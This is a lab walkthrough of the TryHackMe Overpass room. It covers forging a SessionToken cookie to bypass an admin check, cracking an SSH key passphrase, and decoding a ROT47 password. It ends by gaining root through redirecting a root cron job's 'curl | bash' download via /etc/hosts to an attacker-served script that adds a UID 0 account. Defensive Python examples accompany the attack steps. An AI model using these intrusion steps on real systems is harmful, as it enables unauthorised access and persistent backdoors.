Overpass Room Walkthrough on TryHackMe: A Comprehensive Guide

In this detailed guide, we will explore the Overpass room on TryHackMe, a platform designed for cybersecurity enthusiasts to hone their skills. This particular room presents a realistic web application challenge that encompasses various vulnerabilities, including weak passwords, exposed credentials, and a classic privilege escalation pathway. By the end of this walkthrough, you will have a thorough understanding of how to navigate the challenges presented in this room.

Machine Overview

Before diving into the steps, let’s take a look at the machine specifications:

  • Operating System: Linux
  • Difficulty Level: Easy
  • Required Skills: Web Enumeration, SSH Access, Privilege Escalation

Step 1: Conducting Initial Reconnaissance with Nmap

The first step in any penetration test is reconnaissance. We will use Nmap, a network scanning tool, to identify open ports and the services behind them. Scan every TCP port first, then run version detection only against the ports that came back open (a full-range -sV scan is far slower):

nmap -p- <target-ip>
nmap -sV -p 22,80 <target-ip>

This scan will reveal the following open ports:

  • Port 22: SSH
  • Port 80: HTTP

The version scan fingerprints the web service on port 80 as a Go net/http server rather than Apache or nginx, which hints at a custom application. Nothing about it looks vulnerable at first glance; that observation sets the stage for web enumeration.


Step 2: Web Enumeration to Discover Hidden Directories

Next, browse to the web server on port 80. You will see a simple site introducing a project named “Overpass”, a password manager. To uncover directories the site does not link to, run a directory brute-force with Gobuster (wordlist paths vary by distribution; on Kali this list usually lives at /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt):

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/directory-list-2.3-medium.txt

Among the results is /admin, which serves an administrator login page.

Finding the Admin Login

Upon inspecting the login page, standard login attempts fail. The page source, however, references two scripts: login.js and cookie.js (the latter is just the js-cookie helper library). In login.js the browser posts the credentials to /api/login and, unless the response body is the literal string “Incorrect credentials”, stores whatever came back in a cookie named SessionToken and redirects to /admin. The actual flaw is server-side: /admin only checks that a SessionToken cookie is present, not that its value is a token the server issued.

To exploit this, use a browser extension such as Cookie-Editor (or the browser’s developer console) to set a SessionToken cookie with any arbitrary value, then reload /admin. The page loads without authentication and exposes an SSH private key belonging to a user named James.
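The broken check and a hardened replacement side by side, as an added Python example that is not part of the room or the original post. The function names and the in-memory session store are assumptions for illustration; the point is the difference between "a cookie named SessionToken exists" and "this cookie value matches a session we issued and it has not expired".

```python
import hashlib
import secrets
import time
from typing import Dict, Optional, Tuple

SESSION_TTL_SECONDS = 3600

# Hypothetical server-side session store: SHA-256(token) -> (username, expiry).
# Keying by hash means a leaked copy of the table does not hand out usable cookies.
SessionStore = Dict[str, Tuple[str, float]]


def vulnerable_is_authenticated(cookies: Dict[str, str]) -> bool:
    """The Overpass-style check: any SessionToken cookie is accepted.

    Nothing compares the value against tokens the server actually issued,
    so an attacker can set SessionToken=anything and reach /admin.
    """
    return "SessionToken" in cookies


def _token_key(token: str) -> str:
    return hashlib.sha256(token.encode()).hexdigest()


def issue_session(store: SessionStore, username: str,
                  now: Optional[float] = None) -> str:
    """Mint a 256-bit random token, record owner and expiry, return the cookie value."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    store[_token_key(token)] = (username, now + SESSION_TTL_SECONDS)
    return token


def hardened_is_authenticated(cookies: Dict[str, str], store: SessionStore,
                              now: Optional[float] = None) -> Optional[str]:
    """Return the username bound to a valid, unexpired session, else None.

    The lookup is by hash of the presented value, so no code path compares a
    secret token byte-by-byte against attacker input, and an unknown value
    simply misses the store.
    """
    now = time.time() if now is None else now
    presented = cookies.get("SessionToken")
    if not presented:
        return None
    key = _token_key(presented)
    entry = store.get(key)
    if entry is None:
        return None
    username, expires_at = entry
    if now >= expires_at:
        del store[key]  # expired: remove it so it cannot be replayed later
        return None
    return username


if __name__ == "__main__":
    store: SessionStore = {}
    forged = {"SessionToken": "anything"}
    print("vulnerable accepts forged cookie:", vulnerable_is_authenticated(forged))
    print("hardened accepts forged cookie:  ", hardened_is_authenticated(forged, store))
    real = issue_session(store, "james")
    print("hardened accepts issued cookie:  ", hardened_is_authenticated({"SessionToken": real}, store))
```

The vulnerable function is exactly what a presence-only check looks like when written down; the hardened one still has to be paired with HttpOnly, Secure and SameSite attributes on the cookie when it is set, which this example does not cover.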


Step 3: Cracking the SSH Key Passphrase

The SSH key you obtained is protected by a passphrase. To crack it we use John the Ripper. First convert the key into John’s hash format with ssh2john (on some distributions it ships as a script such as /usr/share/john/ssh2john.py rather than a command on PATH):

ssh2john privatesshkeyfile > overpass.hash

Next, use John to crack the passphrase:

john overpass.hash --wordlist=/usr/share/wordlists/rockyou.txt

John recovers the passphrase “james13”. SSH refuses to use a private key that other users can read, so restrict the file permissions before logging in as james:

chmod 600 <privatesshkeyfilename>
ssh -i <privatesshkeyfilename> james@<target-ip>

Enter the cracked passphrase when prompted.

Once logged in, you will find the first flag located in the user.txt file.

Bonus: Decoding James’s Hidden Password

Within James’s home directory there is a hidden file named .overpass, which holds the entry saved by the Overpass password manager. It is often described as ROT13, but the file contains digits and punctuation that ROT13 would leave untouched; it is in fact ROT47, which rotates all 94 printable ASCII characters (codes 33 through 126) by 47 positions. Decoding it yields a small JSON record whose pass field is James’s account password:

Deciphered Password: saydrawnlyingpicture
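A ROT47 decoder, with ROT13 alongside for contrast and a crib-based brute force for the case where you suspect a printable-range rotation but not the shift. This is an added Python example, not code from the room or the original post; the sample record it encodes is constructed here to match the shape of a password-manager entry and is not copied from the target.

```python
import codecs
from typing import List

PRINTABLE_LOW = 33    # '!'
PRINTABLE_HIGH = 126  # '~'
PRINTABLE_SPAN = PRINTABLE_HIGH - PRINTABLE_LOW + 1  # 94 characters


def rot_printable(text: str, shift: int) -> str:
    """Rotate each printable ASCII character (33..126) by `shift` positions.

    Space, control characters and non-ASCII pass through unchanged, which is
    the usual ROT47 convention. ROT47 is shift 47; because 2 * 47 == 94 the
    transform is its own inverse, so the same call encodes and decodes.
    """
    out = []
    for ch in text:
        code = ord(ch)
        if PRINTABLE_LOW <= code <= PRINTABLE_HIGH:
            code = PRINTABLE_LOW + (code - PRINTABLE_LOW + shift) % PRINTABLE_SPAN
        out.append(chr(code))
    return "".join(out)


def rot47(text: str) -> str:
    return rot_printable(text, 47)


def rot13(text: str) -> str:
    """Letters-only rotation, for contrast: digits and punctuation are untouched."""
    return codecs.decode(text, "rot13")


def brute_force_rotations(ciphertext: str, crib: str) -> List[int]:
    """Return every shift 1..93 whose output contains `crib`.

    A crib is a string you expect in the plaintext, such as a JSON field name;
    for a rotation over the printable range only one shift will normally fit.
    """
    return [s for s in range(1, PRINTABLE_SPAN) if crib in rot_printable(ciphertext, s)]


# Constructed sample record, encoded with rot47 above (not taken from the target).
SAMPLE_PLAINTEXT = '[{"name":"System","pass":"saydrawnlyingpicture"}]'
SAMPLE_CIPHERTEXT = rot47(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("ciphertext          :", SAMPLE_CIPHERTEXT)
    print("rot47               :", rot47(SAMPLE_CIPHERTEXT))
    print("rot13 (wrong tool)  :", rot13(SAMPLE_CIPHERTEXT))
    print("shifts with '\"pass\"':", brute_force_rotations(SAMPLE_CIPHERTEXT, '"pass"'))
```

Running it shows why the ROT13 label is wrong: rot13 of the ciphertext still contains the digits and punctuation of the encoded form, while rot47 restores the JSON exactly, and the brute force returns only shift 47.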


Step 4: Privilege Escalation to Root

Now that you have access to the user account, it’s time to escalate your privileges to root. Start by checking for SUID binaries and running the sudo -l command to see what privileges you have. For a more thorough system enumeration, we will utilize LinPEAS, a script designed to assist in privilege escalation.

First, host a Python server on your attacking machine:

python3 -m http.server 8080

Next, download and run LinPEAS on the target. The URL must include the port your server is listening on:

wget http://<your-ip>:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinPEAS (or simply cat /etc/crontab) reveals a cron job that runs as root every minute:

* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

The job fetches buildscript.sh by hostname, so whoever controls how overpass.thm resolves controls what root executes. Check the permissions on /etc/hosts first:

ls -l /etc/hosts

In this room the file is world-writable, which is the misconfiguration that makes the attack possible. Edit it and point overpass.thm at your attacking machine:

vim /etc/hosts
<your-machine-ip> overpass.thm

Now host a malicious buildscript.sh. The cron job requests overpass.thm/downloads/src/buildscript.sh with no port, so it will connect to port 80 and expect that exact path: create a downloads/src/ directory on your attacking machine, save the following as buildscript.sh inside it, and serve the parent directory on port 80 (python3 -m http.server 80, run with sudo since port 80 is privileged):

#!/bin/bash
useradd -ou 0 -g 0 newroot
echo "newroot:password" | chpasswd

Within a minute the cron job downloads and runs your script as root, creating a second UID 0 account. Switch to it with su newroot (password: password) and read the root flag in /root.
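The defender’s view of the same weakness: an audit script that scans a system crontab for download-and-execute jobs and cross-references the download host against /etc/hosts, which is what made the hijack above possible. This is an added Python example, not part of the room or the original post; the crontab and hosts contents are constructed samples (the cron line reproduces the pattern from this box, 192.0.2.10 is a documentation-range address standing in for the attacker), and the severity rules are illustrative choices.

```python
import os
from typing import Dict, List, NamedTuple, Optional, Tuple
from urllib.parse import urlparse

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Constructed /etc/crontab (schedule, user, command); last entry is the risky one.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  2    * * *   backup  tar czf /var/backups/home.tgz /home
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
"""

# Constructed /etc/hosts as it would look after the hijack in Step 4.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
127.0.1.1 overpass-prod
192.0.2.10 overpass.thm
"""


class Finding(NamedTuple):
    user: str
    host: str
    hosts_override: Optional[str]
    severity: str
    command: str


def parse_system_crontab(text: str) -> List[Tuple[str, str, str]]:
    """Return (schedule, user, command) triples; skips blanks, comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] not in "0123456789*@":
            continue
        if line.startswith("@"):            # @reboot / @daily style shortcuts
            parts = line.split(None, 2)
            if len(parts) < 3:
                continue
            schedule, user, command = parts
        else:                               # five schedule fields, then user, then command
            parts = line.split(None, 6)
            if len(parts) < 7:
                continue
            schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        entries.append((schedule, user, command))
    return entries


def find_pipe_to_shell(command: str) -> Optional[str]:
    """Return the download host if curl/wget output is piped straight into a shell.

    Heuristic: the first non-option token after curl/wget is taken as the URL,
    so `curl -o file URL | sh` would misreport `file`; acceptable for an audit.
    """
    stages = [s.strip() for s in command.split("|")]
    for downloader, consumer in zip(stages, stages[1:]):
        tokens = downloader.split()
        if not tokens or tokens[0] not in ("curl", "wget"):
            continue
        consumer_tokens = consumer.split()
        if consumer_tokens and consumer_tokens[0] == "sudo":
            consumer_tokens = consumer_tokens[1:]
        if not consumer_tokens or os.path.basename(consumer_tokens[0]) not in SHELLS:
            continue
        for tok in tokens[1:]:
            if tok.startswith("-"):
                continue
            host = urlparse(tok if "://" in tok else "//" + tok).hostname
            if host:
                return host
    return None


def parse_hosts(text: str) -> Dict[str, str]:
    """Map each name in /etc/hosts-style text to its address (first entry wins)."""
    mapping: Dict[str, str] = {}
    for raw in text.splitlines():
        fields = raw.split("#", 1)[0].split()
        for name in fields[1:]:
            mapping.setdefault(name.lower(), fields[0])
    return mapping


def audit_crontab(crontab_text: str, hosts_text: str) -> List[Finding]:
    """Flag fetch-and-execute cron jobs; root jobs whose host is pinned in /etc/hosts rate highest."""
    hosts = parse_hosts(hosts_text)
    findings = []
    for _schedule, user, command in parse_system_crontab(crontab_text):
        host = find_pipe_to_shell(command)
        if host is None:
            continue
        override = hosts.get(host.lower())
        if user == "root" and override is not None:
            severity = "critical"   # root executes whatever this local mapping points at
        elif user == "root":
            severity = "high"
        else:
            severity = "medium"
        findings.append(Finding(user, host, override, severity, command))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB, SAMPLE_HOSTS):
        print(f"[{f.severity}] user={f.user} host={f.host} hosts_entry={f.hosts_override}: {f.command}")
```

The remediation the finding points at is the same in every environment: do not pipe remote content into a root shell; download to a file, verify a pinned checksum or signature, then execute, and make sure /etc/hosts is owned by root with mode 0644 so name resolution cannot be redirected by an unprivileged user.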


Conclusion

The Overpass room on TryHackMe provides an excellent opportunity to practice web application security and penetration testing techniques. By following the steps outlined in this walkthrough, you have learned how to conduct reconnaissance, exploit vulnerabilities, crack passwords, and escalate privileges effectively. This experience not only enhances your technical skills but also prepares you for real-world cybersecurity challenges.


Frequently Asked Questions (FAQ)

What is TryHackMe?

TryHackMe is an online platform that offers hands-on cybersecurity training through various challenges and virtual environments.

What skills do I need to complete the Overpass room?

To successfully navigate the Overpass room, you should have a basic understanding of web enumeration, SSH access, and privilege escalation techniques.

How can I improve my penetration testing skills?

Regular practice on platforms like TryHackMe, participating in Capture The Flag (CTF) competitions, and studying cybersecurity concepts can significantly enhance your skills.

What tools are commonly used in penetration testing?

Some popular tools include Nmap for scanning, Gobuster for directory brute-forcing, John the Ripper for password cracking, and LinPEAS for privilege escalation enumeration.

Is the Overpass room suitable for beginners?

Yes, the Overpass room is categorized as easy, making it an ideal starting point for those new to penetration testing.
